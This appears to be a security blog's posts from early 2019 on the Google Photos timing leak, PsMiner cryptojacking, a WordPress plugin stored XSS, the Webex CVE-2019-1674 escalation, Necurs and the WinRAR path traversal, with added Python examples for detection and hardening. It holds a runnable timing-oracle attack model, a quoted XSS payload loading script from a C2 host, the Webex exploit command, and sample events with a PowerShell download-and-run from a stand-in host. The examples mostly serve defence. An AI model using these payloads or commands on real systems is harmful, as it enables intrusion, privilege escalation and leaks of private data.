Saturday, March 23, 2019

Metadata remnants patched on Google Photos

   A bug was disclosed this week in Google Photos that let a malicious website learn details of the photos in a logged-in user's Google Photos account by way of their metadata. The attacker's page issues search queries against the victim's account, for example for a location, and measures how long each response takes. Even though the response itself cannot be read across origins (it may well be an access-denied page), its timing has value: a query that matches photos takes measurably longer than one that matches nothing, so this cross-site search (XS-Search) attack can confirm or deny the presence of particular tags in the victim's photos.

    Location is probably the most dangerous piece of information this attack leaks, because consecutive searches can build a timeline of the victim's travels. In the original report, the researcher was able to determine the approximate dates of a visit to another country from a malicious website that interacted with the victim's logged-in Google Photos session.

    While the attack gives no access to the photos themselves, only to whether or not the specified terms exist, that yes/no answer can be extrapolated into schedules and used to craft more convincing malvertising or phishing. One could imagine a malware-ridden site harvesting email addresses and location information, then sending emails about a problem with travel expenses for a trip the victim really took within the stated time frame, which lends the lure credibility.
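A model of the timing oracle described above, added here as an illustration and not code from the original report: a constructed photo library stands in for the victim's account, the search endpoint is replaced by a function that returns only elapsed time (the body stays unreadable, as it would cross-origin), and the "<tag> before:<date>" query syntax, the per-hit cost and the jitter are assumptions. It shows why one sample is not enough, how taking the median of repeated requests makes the presence answer reliable, and how a presence oracle alone narrows a visit date by binary search.

```python
import random
import statistics

# Constructed stand-in for the victim's photo library (illustrative data).
VICTIM_PHOTOS = [
    {"tags": ["beach", "Lisbon"], "taken": "2018-06-14"},
    {"tags": ["beach", "Lisbon"], "taken": "2018-06-15"},
    {"tags": ["museum", "Lisbon"], "taken": "2018-06-16"},
    {"tags": ["dog", "park"], "taken": "2018-07-02"},
    {"tags": ["skyline", "Tokyo"], "taken": "2019-01-03"},
]

BASE_MS = 40.0        # assumed fixed cost of any search request
PER_HIT_MS = 8.0      # assumed extra server work per matching photo
JITTER_SD_MS = 2.0    # assumed network/scheduling noise
_rng = random.Random(2019)   # seeded so the run is repeatable


def search_latency_ms(query, photos=VICTIM_PHOTOS):
    """Victim-side search as a cross-origin attacker sees it: the response
    body is unreadable, only the elapsed time comes back. The assumed
    syntax '<tag> before:<YYYY-MM-DD>' mirrors a date-filtered search."""
    tag, _, cutoff = query.partition(" before:")
    hits = [p for p in photos
            if tag in p["tags"] and (not cutoff or p["taken"] < cutoff)]
    return BASE_MS + PER_HIT_MS * len(hits) + _rng.gauss(0, JITTER_SD_MS)


def probe_ms(query, samples=21):
    """Attacker-side measurement: repeat the request and take the median,
    so a single noisy sample cannot flip the decision."""
    return statistics.median(search_latency_ms(query) for _ in range(samples))


def has_results(query, margin_ms=4.0):
    """Presence oracle: compare against a query known to match nothing."""
    baseline = probe_ms("zz-no-such-tag")
    return probe_ms(query) - baseline > margin_ms


def earliest_visit(tag, dates):
    """Binary search over the presence oracle: `dates` is an ascending list
    of candidate cut-offs; returns the first one by which a matching photo
    exists, or None if the tag never appears."""
    lo, hi = 0, len(dates)
    while lo < hi:
        mid = (lo + hi) // 2
        if has_results(f"{tag} before:{dates[mid]}"):
            hi = mid
        else:
            lo = mid + 1
    return dates[lo] if lo < len(dates) else None


if __name__ == "__main__":
    quarters = ["2018-01-01", "2018-04-01", "2018-07-01",
                "2018-10-01", "2019-01-01", "2019-04-01"]
    print("Lisbon photos present:", has_results("Lisbon"))
    print("first Lisbon photo before:", earliest_visit("Lisbon", quarters))
```

Note that the fix does not lie in hiding the timing: the defences that matter are stopping the cross-origin request from carrying the victim's credentials at all (SameSite cookies, checking Fetch Metadata headers such as Sec-Fetch-Site on the server) so that the attacker's page never gets an authenticated answer to measure.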

   While this particular flaw has been patched, there are countless other browser-side attacks of this kind, and safeguarding your data is paramount. The attack shows how a clever adversary can wield information no matter how small the leak. Tools are available for content control to prevent data leakage: PuriFile, for example, can help manage metadata, scrub documents of sensitive terms and information, and detect data that may have been obfuscated.


Thanks to Peraton for this information


Please share this important information with those you know.

U.S. Attorney General William P. Barr recently stated that crimes against the elderly target some of the most vulnerable people in our society: because of their stage in life, they often do not have the opportunity to recover, and the losses are devastating to them.
Whether as the result of isolation, diminished cognition, financial insecurity, trusting too much, shame at having been scammed, concern about how relatives will react, serious health concerns or other causes, many of these crimes go unreported.

Information on The Federal Bureau of Investigation Site

Information on The Department of Justice Site

The video below discusses scams and identity theft, looks at trends, and gives tips and tools, with a focus on the Federal Trade Commission's Pass It On campaign:

Extent of elder abuse, causes and characteristics, addressing mistreatment, financial exploitation and perpetrators:

Abuse by caregivers, domestic violence, fraud and financial abuse, training resources and tools, and additional information and resources:

Contains prosecutor video series, federal financial exploitation resources, rural and tribal resources, multidisciplinary guide and toolkit, webinars for elder abuse professionals, elder abuse statutes and elder justice resources by state:

Information on The Better Business Bureau Site

The BBB tracks reported scams throughout the U.S.

If you become aware of elder fraud and/or abuse, you are right to be concerned. If you SEE SOMETHING, please SAY SOMETHING in a timely manner to law enforcement, security and/or your supervisor, and give the authorities the chance to make a difference.

Friday, March 15, 2019

The Virtual Security Summit by Microsoft

This free event has lots of good content; the sessions are listed below. The event streams live on April 16, 9 a.m. to 12 noon PT.
To register go here

Featured Speakers
Securing emerging technologies

Learn about the new trends that will affect cybersecurity into the future of Internet of Things and Machine Learning, and learn how to maintain your organization’s resiliency throughout innovations in cybersecurity.

Sian John 
Chief Security Advisor, Microsoft EMEA 
Hafid Elabdellaoui 
Chief Security Advisor, Microsoft 
Evolution of cyberthreats: Customer conversation identity and threat

Join this discussion on the evolution of cyberthreats and the latest thinking on identity and threat protection tactics.
Joram Borenstein
General Manager, Cybersecurity Solutions Group, Microsoft
Kostas Georgakopoulos
Chief Information Security Officer, Procter & Gamble
The importance of security frameworks CIS, NIST and others

Fraud Detection as a Service (FDaaS) is helping government customers detect and prevent improper payments. Learn how your agency can save significant staff resources and ensure proper distribution of funds.
Curtis W. Dukes
Executive Vice President and General Manager
Security Best Practices and Automation Group, CIS
Sean Sweeney
Americas Director, Cybersecurity Solutions Group, Microsoft

Threat of Cryptojacking Still an Issue

In November 2018 Forbes ran an article about the increase in cryptojacking. At the time the Cyber Threat Alliance (CTA) was reporting a 629% increase in infections in the short span from Q1 to Q2 of 2018. The count had grown from an estimated 400,000 infections (Q4 2017) to 2.5 million infected machines in Q2 2018, and 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has grown. For example, WebCobra, a Russian-origin threat found by McAfee Labs researchers, drops one of two different miner payloads depending on the architecture it detects on the infected machine.

The threats are also becoming more sophisticated. 360 Total Security researchers have released details of the newer PsMiner malware, which is designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, WebLogic, ThinkPHP and SQL Server in order to spread from server to server and mine Monero.

The worm is driven by a file called Systemctl.exe, written in Go, which bundles the exploit modules and uses them to attack Windows servers. In addition to the exploits, PsMiner carries a brute-force password component, so a system with weak or default credentials can be entered without any vulnerability at all.

Once PsMiner has access to a system, it runs a PowerShell command that downloads WindowsUpdate.ps1, a malicious payload and master module that drops the Monero miner. The malware then copies itself into the temp directory and creates a scheduled task called “Update service for Windows Service” that runs every 10 minutes to refresh the infection. Using the XMRig CPU miner with a custom mining profile and living-off-the-land (LotL) techniques such as PowerShell and scheduled tasks, the worm can persist for some time.

This also shows the level of sophistication to which bad actors have access. Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking scripts on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These apps have since been removed from the Microsoft Store, but they show a troubling pattern of predatory behaviour. Estimates indicate that ten times more organizations were affected by cryptojacking than by ransomware last year. It is clear that cryptojacking is still a threat to consider in 2019.

Sources -worm-uses-cryptojacking-module-to-mine-for-monero/

Abandoned Cart plugin for WordPress sites exploited

    Online shopping has the convenience of collecting items and passing personal judgement on the things you like and the things you don't, all without hauling them around a labyrinth of smells and sounds. With the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you want to pick up where you left off after a pressing matter arises or you simply lose interest for the time being. But Wordfence security researchers have found a flaw in the Abandoned Cart plugin being exploited in the wild, enabling a complete site takeover along with a secondary backdoor to regain access in case of discovery.

    The Abandoned Cart plugin lacked input sanitization and output encoding for the fields a user fills in when beginning checkout. The billing_first_name and billing_last_name fields are stored exactly as entered, then displayed concatenated in a customer column when the administrator views the plugin's dashboard. The attack submits a random first and last name and a random email address so that the form accepts the entry, but puts both the first and last name in billing_first_name and “<script src=hXXps://bit[.]ly/2SzpVBY></script>” in billing_last_name. The shortened URL leads to a command-and-control server, “hXXps://cdn-bigcommerce[.]com/visionstat.js”, which serves the malicious JavaScript payload. This is a stored cross-site scripting (XSS) flaw: the payload runs in the administrator's browser, with the administrator's session, as soon as the dashboard is opened.

    The script first uses the administrator's browser session to perform trusted actions on the WordPress site through hidden iframes, while the administrator remains unaware of the intrusion. The first action is creating an administrative user whose credentials the attacker holds. Who needs a backdoor when you can cut keys to the front door for yourself? The username on these clandestine accounts has consistently been “woouser”, with a woouser address at Mailinator, a free disposable email service. The malicious JavaScript then infects an inactive plugin with a script that keeps listening for commands from the C2 server and can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website's URL to the C2 server, and a confirmation email is sent to the Mailinator address to confirm the administrator account.

    A patch for this vulnerability was released which uses WordPress's own data sanitizer to reject names beginning with “<” and any account with “woouser” in the email address. While this prevents the initial attack from creating adversary-controlled accounts, it does not address the code already injected into deactivated plugins on sites that were compromised before patching; those sites need the rogue administrator removed and the plugin directory cleaned as well.
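The two halves of the flaw side by side, as an added example that is not the plugin's own code: the pre-patch rendering that concatenates stored checkout fields straight into the dashboard's HTML, the same rendering with output encoding applied, an input-side check in the spirit of the patch, and a hunt over a constructed wp_users export for the “woouser” administrator. The checkout submission, the script URL and the user rows are made up to match the shape described above.

```python
import html
import re

# Constructed checkout submission shaped like the attack described above;
# the script URL is a placeholder, not the real one.
MALICIOUS_CHECKOUT = {
    "billing_first_name": "Jordan Smith",
    "billing_last_name": '<script src="https://cdn.attacker.invalid/visionstat.js"></script>',
    "billing_email": "q7f3a@mailer.invalid",
}
BENIGN_CHECKOUT = {
    "billing_first_name": "Ana",
    "billing_last_name": "O'Neil & Sons",
    "billing_email": "ana@example.invalid",
}


def render_customer_vulnerable(row):
    """Modelled pre-patch behaviour: stored values are concatenated into the
    dashboard's HTML untouched, so stored markup runs in the admin's browser."""
    return "<td>{} {}</td>".format(row["billing_first_name"], row["billing_last_name"])


def render_customer_fixed(row):
    """Output encoding at render time: HTML-escape the stored value, so a
    script tag becomes inert text while legitimate characters survive."""
    name = "{} {}".format(row["billing_first_name"], row["billing_last_name"])
    return "<td>{}</td>".format(html.escape(name, quote=True))


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def has_markup(row):
    """Input-side check in the spirit of the patch's rejection of names that
    start with '<': flags any submitted field containing a script tag."""
    return any(SCRIPT_TAG.search(str(value)) for value in row.values())


# Constructed wp_users rows for hunting the attacker's administrator account.
WP_USERS = [
    {"user_login": "alice", "user_email": "alice@example.invalid", "role": "administrator"},
    {"user_login": "editor1", "user_email": "ed@example.invalid", "role": "editor"},
    {"user_login": "woouser", "user_email": "woouser@mailinator.com", "role": "administrator"},
]


def suspicious_admins(users):
    """Logins of administrators whose login or email carries the 'woouser' indicator."""
    return [u["user_login"] for u in users
            if u["role"] == "administrator"
            and ("woouser" in u["user_login"].lower() or "woouser" in u["user_email"].lower())]
```

Escaping on output is the durable fix; rejecting inputs that start with “<” stops this particular payload but not a name like “Smith <script>”. The hidden-iframe actions the script performs are a separate issue: WordPress admin actions are meant to be protected by nonces, which is what stops a script that merely holds the admin's cookies from creating users.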



Friday, March 1, 2019

New Elevation of Privilege Vulnerability in Cisco Webex

     A new elevation-of-privilege vulnerability has been discovered in the Cisco Webex Meetings desktop app for Windows® by security researcher Marcos Accossatto of SecureAuth's Exploit Writers Team.

     This vulnerability, tracked as CVE-2019-1674, is an OS command injection that can be used to bypass the new controls Cisco put in place after patching a previously disclosed DLL hijacking issue in 2018. It allows a local attacker to elevate privileges by invoking the update service's install command. An attacker exploits the flaw by swapping out the Cisco Webex Meetings update binary for “a previous vulnerable version through a fake update… that will load a malicious DLL.” The researchers also noted that while the vulnerability can only be exploited locally, it could be exploited remotely in an Active Directory environment through operating system remote management tools.

    The Cisco Webex Meetings update service uses an XML manifest to check the files it is given when installing an update, but it fails to validate their version numbers. This is how an attacker can feed different files to the update service and trick it into “updating” the program to an older, insecure version of Cisco Webex Meetings. According to SecureAuth, “The vulnerability can be exploited by copying to a local attacker controlled folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn't work, then 2 should be used).” The research team also released a two-step proof of concept showing how this vulnerability can be exploited.
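Both the PsMiner persistence chain described in the cryptojacking post above (the PowerShell download of WindowsUpdate.ps1, Systemctl.exe in the temp directory, the “Update service for Windows Service” scheduled task, the XMRig miner) and the Webex update-service abuse just quoted leave the same kind of trace: a process creation with a telltale command line. The hunting script below is added here as an example and is not taken from either advisory; it runs a small rule set over constructed Sysmon-style process events, and the sample host names, paths and command lines are made up to resemble the techniques.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Security 4688 shape)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Each rule is (name, regex applied to "<image> <command line>").
RULES = [
    ("psminer_stager_download",
     re.compile(r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b).*WindowsUpdate\.ps1", re.I)),
    ("psminer_scheduled_task",
     re.compile(r"schtasks.*/create.*Update service for Windows Service", re.I)),
    ("psminer_go_dropper_in_temp",
     re.compile(r"\\Temp\\[^ ]*systemctl\.exe", re.I)),
    ("xmrig_miner_launch",
     re.compile(r"xmrig|--donate-level|cryptonight|stratum\+tcp://", re.I)),
    ("webex_update_service_abuse",
     re.compile(r"\bsc(\.exe)?\s+start\s+webexservice\s+install\s+software-update\s+[12]\s+", re.I)),
]


def match_rules(event):
    """Names of every rule the event trips, in rule order."""
    text = f"{event.image} {event.command_line}"
    return [name for name, rx in RULES if rx.search(text)]


def hunt(events):
    """Return (host, rule, command_line) for each rule hit, preserving order."""
    hits = []
    for ev in events:
        for name in match_rules(ev):
            hits.append((ev.host, name, ev.command_line))
    return hits


# Constructed events: three that mimic the techniques and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent("srv01", "C:\\Users\\svc\\AppData\\Local\\Temp\\Systemctl.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://c2.invalid/WindowsUpdate.ps1')\""),
    ProcEvent("srv01", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "C:\\Windows\\System32\\schtasks.exe",
              'schtasks /create /f /sc minute /mo 10 /tn "Update service for Windows Service" '
              '/tr "C:\\Users\\svc\\AppData\\Local\\Temp\\Systemctl.exe"'),
    ProcEvent("ws07", "C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\sc.exe",
              "sc start webexservice install software-update 1 C:\\Users\\mallory\\fakeupdate"),
    ProcEvent("ws07", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\svchost.exe",
              "svchost.exe -k netsvcs -p"),
    ProcEvent("srv02", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\sc.exe",
              "sc query webexservice"),
]

if __name__ == "__main__":
    for host, rule, cmd in hunt(SAMPLE_EVENTS):
        print(f"{host:6} {rule:28} {cmd[:70]}")
```

The webexservice rule fires only on the install software-update form with a path argument, so routine service queries stay quiet; on the PsMiner side, a host that trips the scheduled-task rule is worth checking with a task listing for the same task name, since the task is what brings the miner back every 10 minutes.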

     The timeline for this vulnerability spans about two months: on Dec. 4, 2018, SecureAuth sent the initial notification to Cisco PSIRT. On Dec. 5, 2018, Cisco confirmed receipt of the advisory and opened a case, and on Dec. 7, 2018, Cisco confirmed it had reproduced the vulnerability and begun working on a fix. On Dec. 10, 2018, Cisco told SecureAuth that the fix would be generally available by the end of February. After a couple of requests from SecureAuth for status updates, Cisco said on Jan. 22, 2019 that it was still aiming for an end-of-February release. Finally, on Feb. 11, 2019, Cisco confirmed that Feb. 27, 2019 would be the official disclosure date, and the patch has now been published.

    If your company uses Cisco WebEx Meetings desktop app on Windows, be sure to update it immediately to avoid any potential attacks due to this vulnerability.

Thursday, February 28, 2019

CenturyLink Announces New Threat Research on Necurs

"Necurs is the multitool of botnets, evolving from operating as a spam botnet delivering banking trojans and ransomware to developing a proxy service, as well as cryptomining and DDoS capabilities," said Mike Benjamin, head of Black Lotus Labs. "What's particularly interesting is Necurs' regular cadence of going dark to avoid detection, reemerging to send new commands to infected hosts and then going dark again. This technique is one of the many reasons Necurs has been able to expand to more than half a million bots around the world."

Key Takeaways

  • Beginning in May of 2018, Black Lotus Labs observed regular, sustained downtime of roughly two weeks, followed by roughly three weeks of activity for the three most active groups of bots comprising Necurs.
  • Necurs' roughly 570,000 bots are distributed globally, with about half located in the following countries, in order of prevalence: India, Indonesia, Vietnam, Turkey and Iran. 
  • Necurs uses a domain generation algorithm (DGA) to obfuscate its operations and avoid takedown. However, a DGA is a double-edged sword: once the algorithm has been reverse engineered, the domains Necurs will use are known in advance, so security researchers can use methods like sinkholing DGA domains and analyzing DNS and network traffic to enumerate bots and command-and-control (C2) infrastructure.
  • CenturyLink took steps to mitigate the risk of Necurs to customers, in addition to notifying other network owners of potentially infected devices to help protect the internet. 
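The double-edged-sword point in the takeaways above, as an added example that is not Black Lotus Labs' code and does not use the real Necurs algorithm: a small illustrative date-seeded DGA stands in for the family, the defender pre-computes the domains for the coming window exactly as the bots will, and resolver log lines (constructed, in an assumed "<timestamp> <client> <qname>" format) are matched against that set to pick out infected hosts. Seed value, label lengths and TLD choices are assumptions of the toy algorithm.

```python
import hashlib
from datetime import date, timedelta

TLDS = ("com", "net", "biz")


def toy_dga(day_iso, seed=0x1234, count=8):
    """Illustrative DGA (a stand-in, not the Necurs algorithm): derive
    `count` domains for the ISO date `day_iso` from a hash of the
    (seed, date, index) triple, so bot and defender compute the same list."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}:{day_iso}:{i}".encode()).digest()
        length = 8 + digest[0] % 8                      # 8..15 character label
        label = "".join(chr(ord("a") + b % 26) for b in digest[1:1 + length])
        domains.append(f"{label}.{TLDS[digest[-1] % len(TLDS)]}")
    return domains


def precompute(start_iso, days, seed=0x1234):
    """Defender side: once the algorithm and seed are known, enumerate the
    domains for the coming window to sinkhole, pre-register, or alert on.
    Returns {domain: iso_date}."""
    start = date.fromisoformat(start_iso)
    table = {}
    for offset in range(days):
        day_iso = (start + timedelta(days=offset)).isoformat()
        for dom in toy_dga(day_iso, seed):
            table[dom] = day_iso
    return table


def find_infected(log_lines, table):
    """Match resolver log lines (constructed format '<ts> <client_ip> <qname>')
    against the precomputed set. Returns (client_ip, qname, iso_date) hits."""
    hits = []
    for line in log_lines:
        ts, client, qname = line.split()
        qname = qname.rstrip(".").lower()
        if qname in table:
            hits.append((client, qname, table[qname]))
    return hits


# Constructed resolver log: two DGA look-ups from one host, two benign queries.
SAMPLE_DNS_LOG = [
    "2019-02-28T10:14:02Z 10.0.0.5 " + toy_dga("2019-02-28")[0] + ".",
    "2019-02-28T10:14:09Z 10.0.0.5 " + toy_dga("2019-02-28")[3],
    "2019-02-28T10:15:41Z 10.0.0.9 www.example.com.",
    "2019-02-28T10:16:00Z 10.0.0.9 updates.example.net",
]

if __name__ == "__main__":
    table = precompute("2019-02-27", 7)
    for client, qname, day in find_infected(SAMPLE_DNS_LOG, table):
        print(f"{client} queried {qname} (domain for {day})")
```

The same precomputed table is what makes sinkholing work: whoever registers tomorrow's domains first receives the bots' check-ins, which is both how researchers count the infected population and why botnet operators pair a DGA with the go-dark cadence described above.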

SOURCE CenturyLink, Inc.

Tuesday, February 26, 2019

ICANN urges adopting DNSSEC now

With DNS servers being attacked all over the world, the Internet Corporation for Assigned Names and Numbers (ICANN) believes that there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure.

In the context of increasing reports of malicious activity targeting the DNS infrastructure, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. The organization also reaffirms its commitment to engage in collaborative efforts to ensure the security, stability and resiliency of the Internet’s global identifier systems.

As one of many entities engaged in the decentralized management of the Internet, ICANN is specifically responsible for coordinating the top-most level of the DNS to ensure its stable and secure operation and universal resolvability.

On 15 February 2019, in response to reports of attacks against key parts of the DNS infrastructure, ICANN offered a checklist of recommended security precautions for members of the domain name industry, registries, registrars, resellers, and related others, to proactively take to protect their systems, their customers’ systems and information reachable via the DNS.

Public reports indicate that there is a pattern of multifaceted attacks utilizing different methodologies. Some of the attacks target the DNS, in which unauthorized changes to the delegation structure of domain names are made, replacing the addresses of intended servers with addresses of machines controlled by the attackers. This particular type of attack, which targets the DNS, only works when DNSSEC is not in use. DNSSEC is a technology developed to protect against such changes by digitally 'signing' data to assure its validity. Although DNSSEC cannot solve all forms of attack against the DNS, when it is used, unauthorized modification to DNS information can be detected, and users are blocked from being misdirected.

ICANN has long recognized the importance of DNSSEC and is calling for full deployment of the technology across all domains. Although this will not solve the security problems of the Internet, it aims to assure that Internet users reach their desired online destination by helping to prevent so-called “man in the middle” attacks where a user is unknowingly re-directed to a potentially malicious site. DNSSEC complements other technologies, such as Transport Layer Security (most typically used in HTTPS) that protect the end user/domain communication.
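One operational check that comes with deploying DNSSEC, added here as an example rather than anything from the ICANN notice: signatures carry an inception and expiration time, and an RRSIG that is allowed to expire makes the zone fail validation just as surely as an attack would. The script parses RRSIG records in zone-file presentation format (the records and the base64 signature fields below are constructed placeholders) and reports which signatures are expired, not yet valid, or due to expire within a warning window.

```python
from datetime import datetime, timedelta, timezone

# Constructed RRSIG records in presentation format; the base64 signature
# fields are placeholders, not real signatures.
SAMPLE_RRSIGS = """\
example.net.      3600 IN RRSIG A      13 2 3600 20190301120000 20190130120000 34521 example.net. c2lnLXBsYWNlaG9sZGVy
www.example.net.  3600 IN RRSIG A      13 3 3600 20190226090000 20190127090000 34521 example.net. c2lnLXBsYWNlaG9sZGVy
example.net.      3600 IN RRSIG DNSKEY 13 2 3600 20190601000000 20190201000000  2371 example.net. a3NrLXBsYWNlaG9sZGVy
"""


def _ts(field):
    """RRSIG times are YYYYMMDDHHMMSS in UTC."""
    return datetime.strptime(field, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def parse_rrsig(line):
    """Split one RRSIG line into its RDATA fields (RFC 4034 section 3.2 order)."""
    f = line.split()
    if len(f) < 13 or f[2] != "IN" or f[3] != "RRSIG":
        raise ValueError(f"not an RRSIG record: {line!r}")
    return {
        "owner": f[0], "ttl": int(f[1]), "covers": f[4], "algorithm": int(f[5]),
        "labels": int(f[6]), "original_ttl": int(f[7]),
        "expiration": _ts(f[8]), "inception": _ts(f[9]),
        "key_tag": int(f[10]), "signer": f[11], "signature": "".join(f[12:]),
    }


def check_rrsig(sig, now, warn_within=timedelta(days=7)):
    """Status of one signature at `now`; validators reject anything outside
    the inception..expiration window, so 'expiring_soon' is the alarm to act on."""
    if now < sig["inception"]:
        return "not_yet_valid"
    if now >= sig["expiration"]:
        return "expired"
    if sig["expiration"] - now <= warn_within:
        return "expiring_soon"
    return "ok"


def audit_zone(text, now_ts):
    """Map '<owner>/<type>' -> status for every RRSIG line in `text`,
    evaluated at the YYYYMMDDHHMMSS UTC timestamp `now_ts`."""
    now = _ts(now_ts)
    report = {}
    for line in text.splitlines():
        if line.strip():
            sig = parse_rrsig(line)
            report[f"{sig['owner']}/{sig['covers']}"] = check_rrsig(sig, now)
    return report


if __name__ == "__main__":
    for name, status in audit_zone(SAMPLE_RRSIGS, "20190226120000").items():
        print(f"{name:24} {status}")
```

This checks only the validity window, not the cryptography; whether the chain of trust actually validates is a job for a validating resolver or a tool such as delv from BIND. A signer that re-signs on a schedule should never let the warning status appear, so an "expiring_soon" result usually means the signing job has stopped.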

As the coordinator of the top-most level of the DNS, ICANN is in the position to help mitigate and detect DNS-related risks, and to facilitate key discussions together with its partners. The organization believes that all members of the domain name system ecosystem must work together to produce better tools and policies to secure the DNS and other critical operations of the Internet. To facilitate these efforts, ICANN is planning events for the Internet community to address DNS protection; the first is an open session during the upcoming ICANN64 public meeting on 9-14 March 2019 in Kobe, Japan.

As we learn more information, updates may be provided. For information about ICANN64, visit

This article is a repost from the ICANN site, as an important security notice to all who run or use DNS servers. Note that DNSSEC only helps where the resolver validates signatures and the attacker cannot also change the DS records at the registrar, so registrar and registry accounts need multi-factor authentication and registry locks as well.

Saturday, February 23, 2019

617 million accounts stolen

According to The Register's article “617 million accounts stolen from 16 hacked websites now for sale on dark web, seller boasts”:

 Some 617 million online account details stolen from 16 hacked websites are on sale from today on the dark web, according to the data trove's seller.

For less than $20,000 in Bitcoin, it is claimed, the following pilfered account databases can be purchased from the Dream Market cyber-souk, located in the Tor network:
Dubsmash (162 million),
MyFitnessPal (151 million),
MyHeritage (92 million),
ShareThis (41 million),
HauteLook (28 million),
Animoto (25 million),
EyeEm (22 million),
8fit (20 million),
Whitepages (18 million),
Fotolog (16 million),
500px (15 million),
Armor Games (11 million),
BookMate (8 million),
CoffeeMeetsBagel (6 million),
Artsy (1 million), and
DataCamp (700,000).

The hacker told The Register that his goal in putting up the stolen accounts was to ‘make life easier for hackers’. He plans to sell the information to anyone who promises to keep the data secret. He claims to have been hacking since 2012 and to hold data from at least 20 databases.
Further, the hacker stated:
“I don’t think I am deeply evil. I need the money”
“Security is just an illusion. I started hacking a long time ago. I’m just a tool used by the system. We all know measures are taken to prevent cyber attacks, but with these upcoming dumps, I’ll make hacking easier than ever.”

To read the full article go here 

Social Media Phishing Attack

    Social media has changed how the world interacts in so many ways, such as closer interaction between businesses and their customers, law enforcement alerts, and more. Creators of public content who want any real degree of reach involve social media in their business and marketing plans somehow, and many require logging in through social media to view content.

    There are many methods to check that a login prompt is legitimate, but a new phishing technique discovered by researchers at the password management company Myki throws the usual precautions out the window. Phishing is a fraudulent attempt to obtain sensitive personal information by posing as a legitimate entity such as a company or website. It is a form of social engineering, and it is popular and successful because of the willingness of many to take things on the Internet at face value.

    Recent years have shown an increase in phishing attempts leading to serious data breaches, as was the case in the San Diego Unified School District breach involving social security numbers and other personal information of over 500,000 students and staff. 
    Researchers at Myki found that attackers were luring victims to fraudulent blog and service sites that required a Facebook login to access the content. The sites looked legitimate, as did the pop-up window for the Facebook login: the address bar showed the expected URL, the page used HTTPS with a green padlock for a valid certificate, and browser add-ons for detecting malicious domains raised no warnings. Yet the credentials were still harvested by the attacker, because the pop-up was not a real browser window at all: it was built with HTML and JavaScript, inside the original page, to imitate one.

    The only way to tell is to try to drag the window outside the browser. If it is fake, part of it disappears past the edge of the browser instead of moving as a separate window. Harvesting Facebook credentials may not seem like much of a threat beyond seeing what cat pictures friends have posted, but many people reuse the same or similar credentials across many sites, which gives attackers a head start on other accounts. The same technique could also show up elsewhere, such as e-commerce sites asking for PayPal logins. A password manager that only fills credentials on the matching domain is a useful second defence here, since it will not fill a fake window that lives in the attacker's page.


Vulnerability So Old it Could Vote

     This past week a vulnerability was found in the WinRAR archive utility that has existed for almost 19 years. It was discovered by researchers at Check Point Software Technologies. The flaw is a path traversal that lets a crafted archive write a file anywhere the user can write, which leads to code execution. It stems from a third-party DLL, unacev2.dll, used to handle the ACE archive format.
    The bug was discovered by fuzzing WinRAR and identifying the root cause of a crash. The group expected a memory corruption bug but instead found a logic bug which let them write to any location on the target machine, without even needing to know the user name.
     While tracing the root cause, the fuzzer produced an anomaly in which bits of the archive's advertisement string and other pieces of the file's hex dump turned up as the name of a created directory and file.
     They were at first unable to reproduce this inside WinRAR itself because of WinRAR's own filename validation: when the check fails, WinRAR's callback tells unacev2.dll to cancel the extraction, but because the DLL tests the cancel value only after it has already created the directory, the folder is created anyway.
     That alone allows the creation of empty files wherever the attacker likes. The team went a step further and circumvented WinRAR's path limitations through the CleanPath function that WinRAR uses to strip an extraneous ‘C:\’ prefix from relative paths. By adding a second ‘C:\’ they bypassed it: WinRAR's path check does not look for ‘C:’, assuming CleanPath has already removed it, so a name such as ‘C:\C:\...’ comes out of CleanPath as an absolute path that passes the check. With a path traversal in hand, the team also obtained an SMB attack vector by adding further ‘C:\’ prefixes to reach network shares. Code execution is obtained by extracting an executable from an ACE archive renamed to .rar into the user's Startup folder, where it runs at the next logon. The code is arbitrary, and the consequences can be catastrophic.

    The user name can even be avoided by extracting the archive from the Windows Explorer context menu (the WinRAR shell extension) instead of the WinRAR GUI. This works because of how ‘C:’ without a backslash is interpreted by Windows: it means the current directory of the running process on drive C, which inside the WinRAR GUI is WinRAR's own folder but, through the context menu, is the folder containing the archive, typically C:\Users\<user name>\<location of the file>, from which a relative path can reach the Startup folder. When the exploit was reported to WinRAR's developers, they said the arbitrary folder creation lay in the third party's code, and they dropped support for the ACE archive format.
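The CleanPath logic bug above, reduced to a model that is added here for illustration and is not WinRAR's or unacev2.dll's code: a single-pass clean-up strips one leading drive prefix, a validator that trusts the clean-up only looks for ‘..’ components, and the two together let a ‘C:\C:\...’ entry name land outside the extraction directory. The hardened version normalises first, rejects anything that still carries a drive, a leading separator or an upward component, and finally confirms the joined path is inside the extraction directory. Directory names are made up; ntpath is used so the Windows path semantics run on any platform.

```python
import ntpath
import re

DRIVE_PREFIX = "C:\\"
EXTRACT_DIR = "C:\\Users\\victim\\Downloads\\archive"
STARTUP = ("C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows"
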